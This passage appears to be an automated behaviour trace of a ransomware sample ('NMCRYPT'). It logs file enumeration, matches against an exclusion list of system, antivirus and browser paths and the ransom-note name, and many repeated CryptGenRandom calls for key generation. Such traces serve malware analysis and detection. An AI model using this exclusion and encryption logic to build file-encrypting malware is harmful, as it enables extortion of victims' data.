returned 0 [0155.079] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.080] wcscmp (_String1="auxpad", _String2=".") returned 1 [0155.080] wcscmp (_String1="auxpad", _String2="..") returned 1 [0155.080] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*NMCRYPT") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*Recovers your files.html") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*.exe") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*.dll") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*.lnk") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*.bat") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*.ini") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*.msi") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*.scf") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*pagefile.sys*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*AppData*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*\\winrar\\*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*\\java\\*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*\\windows\\*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*\\ESET\\*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*\\AVG\\*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*\\AVIRA\\*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*Atheros*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*Realtek*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*bootmgr*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*boot*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*boot*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*CONFIG.SYS*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*IO.SYS*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*MSDOS.SYS*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*ntldr*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*chrome*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*opera*") returned 0 [0155.080] PathMatchSpecW (pszFile="auxpad.xml", pszSpec="*firefox*") returned 0 [0155.080] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml", pszSpec="*") returned 1 [0155.080] strlen (_Str="NMoreira") returned 0x8 [0155.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.080] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.081] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.082] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.083] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.084] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 